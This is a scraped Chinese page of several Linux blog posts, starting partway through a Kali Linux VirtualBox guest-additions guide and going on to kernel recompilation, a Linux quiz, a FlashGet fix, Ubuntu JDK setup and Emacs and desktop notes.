&apt-get update && apt-get install -y linux-headers-$(uname -r)
安装完后,从VirtualBox菜单的&Install Guest Additions&选择&Devices&来挂载客户端功能增强的ISO到虚拟机的CD光驱.提示自动运行CD时,点击取消按钮.
在终端窗口,复制虚拟机CD-Rom里的VboxLinuxAdditions.run这个文件到本地目录,确认有可执行权限,然后运行该文件开始安装.
cp /media/cd-rom/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
./VBoxLinuxAdditions.run
功能增强工具安装好后重启Kali Linux虚拟机.鼠标和屏幕整合好了,也可以与宿主机共享目录了.创建宿主机的共享目录为了共享宿主机上的目录给你的Kali Linux虚拟机,有一些步骤要完成.在虚拟机管理器,选择你的Kali Linux虚拟机然后点击右键菜单的&Shared Folders&.会弹出一个用于添加共享目录的窗口.在这个窗口里点击图标来添加一个目录.在Folder Path文本框,显示着共享文件夹的路径,或点击下拉菜单箭头来浏览宿主机的系统.勾选Auto-mount(自动挂载)&和&Make Permanent(永久)&复选框,当有提示时点击OK按钮.
现在共享目录会出现在media目录里.为了可以方便的进入到这个目录你可以创建一个书签或者链接.
重新编译Kali Linux内核
有时你可能想添加必要的驱动、补丁、Kali Linux内核里没有的功能.如下的教程描述如何根据你的需要快速地修改和编译Kali Linux内核.请注意目前默认的Kali Linux内核已经打过了大量的无线注入补丁.安装编译所需的依赖开始安装编译内核所需的所有依赖.
apt-get install kernel-package ncurses-dev fakeroot bzip2
下载Kali Linux内核源代码下载并解压Kali Linux的内核源代码.
apt-get install linux-source
cd /usr/src/
tar jxpf linux-source-3.7.tar.bz2
cd linux-source-3.7/
配置内核复制Kali默认的内核配置文件然后根据你的需要修改.这一步你需要应用各种驱动、补丁、等等&在此例中,我们重新编译一个64位内核.
cp /boot/config-3.7-trunk-amd64 .config
make menuconfig
编译内核编译你修改过的内核.需要花的时间和硬件配置有关.
CONCURRENCY_LEVEL=$(cat /proc/cpuinfo|grep processor|wc -l)
make-kpkg clean
fakeroot make-kpkg kernel_image
安装内核内核编译成功后.继续以安装新内核,然后重启.请注意内核版本号可能不同.在此例中,当前的内核版本是3.7.2,你需要根据情况做相应的修改.
dpkg -i ../linux-image-3.7.2_3.7.2-10.00.Custom_amd64.deb
update-initramfs -c -k 3.7.2
update-grub2
重启后,你的新内核应该运行了.如果出错了导致你的内核不能启动,你仍然可以通过启动官方的Kali Linux内核来解决问题.
Black Track的下一代版本 Kali linux1.0发布了
一个跟UNIX、GNU、Linux等等有关的测验
题目是这样的:请将下图中左边圈子(即Set A)里的各图标,与右边圈子(即Set B)里的与前者相匹配或对应的名称,用箭头连接起来。下图中,已经给出了一个连线示例,请你完成全部的连线。
&在不倚助于Google等工具的情况下,你所答出的正确连线之数量,或许可以预示你学习接下来的课程的相关情况:0条 && 你完全不适合本课程的学习,劝退。1 & 14条 && 你的计算机学科基本素养一般,学习后面的课程,须投入很多额外的努力。15&28条 && 你的计算机学科基本素养较好,学习后面的课程,须投入稍多一些的努力。29&41条 && 你的计算机学科基本素养非常好,学习后面的课程,将会比较轻松。如何评判你做出的各条连线是否正确呢?当然是可以利用Google等工具了。在得到这类工具的帮助的情形下,如果你在60分钟内,仍不能确定全部正确连线,那么,结论依然是:你完全不适合本课程的学习,劝退。
Linux下安装FlashGet无法打开的解决办法
安装后无法打开,解决办法问如下:cd /lib/i386-linux-gnusudo &cp libexpat.so.1.5.2 /usr/lib/libexpat.sosudo ln -s /usr/lib/libexpat.so /usr/lib/libexpat.so.0sudo ldconfig&&&&
ubuntu下配置jdk
&&最近准备学习java。下学期学校要讲,自己提前弄一下。大家都知道java是sun公司的。可如今已被oracle收购。这个oracle就是做大型数据库的一个牛逼公司。&jdk的配置和window下一样,安装好jdk之后,配置环境变量。方法如下:&1,终端输入&sudo gedit ~/.bashrc&& &然后在最后一行添加以下代码:& & & & & & export JAVA_HOME=/usr/java/jdk1.7.0_10&&& & &export JRE_HOME=${JAVA_HOME}/jre&&& & &export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib&&& & &export PATH=${JAVA_HOME}/bin:$PATH&& 2.使其立即生效: source ~/.bashrc& 3.成功后,终端输入,java -version的版本信息& &4.emacs写第一个java程序
一个学linux c的网站
ubuntu12.04LTS
& & & 最近又装了linux,决定好好用用,省得每天打dota,浪费生命,顺便好好学习一下emacs(编辑器之神)。vim号称(神的编辑器),就好像倚天剑和屠龙刀,其实精一个就好了。各有利弊,总体来说还是emacs的可扩展性强些,无所谓了。学校老师让我们搞emacs那就搞呗。之前自己太幼稚,觉得emacs没用,下一些blockcode之类的IDE去编程。
& & 其实是我不了解而已,当你没有完全了解某些事物的时候总会去藐视他,觉得他没用。只是自己不懂的开发而已。
& & &最近越来越喜欢linux喜欢emacs。喜欢它的开放,简单,安全。我也很喜欢有这样性格的人。每天总是折腾到后半夜才睡觉,我何时能早睡觉,唉不说了。
--------------------------------------------------------------------------------------------
//ubuntu还原windows桌面风格方法
//关于面板的操作,同时按住徽标和alt键,再用鼠标右键点击面板&
sudo apt-get install gnome-session-fallback&恢复gonme-shell桌面风格,登录的时候选一下就可以了。
&sudo apt-get install&gconf-editor 配置编辑器,类似windows的注册表(regedit),在里面的找到&/apps/metacity/general&选项,把&button_layout&的值修改为&menu:minimize,maximize,close&,最大最小关闭窗口就可以调到右上角。&
linux mint很不错!
ubuntu的11.1是目前的最新版本,可是用起来很不舒服!linux mint我感觉是目前最好用的 linux系统,他是基于ubuntu和debian的。
站长在关注}

我要回帖

更多关于 reshacker教程 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信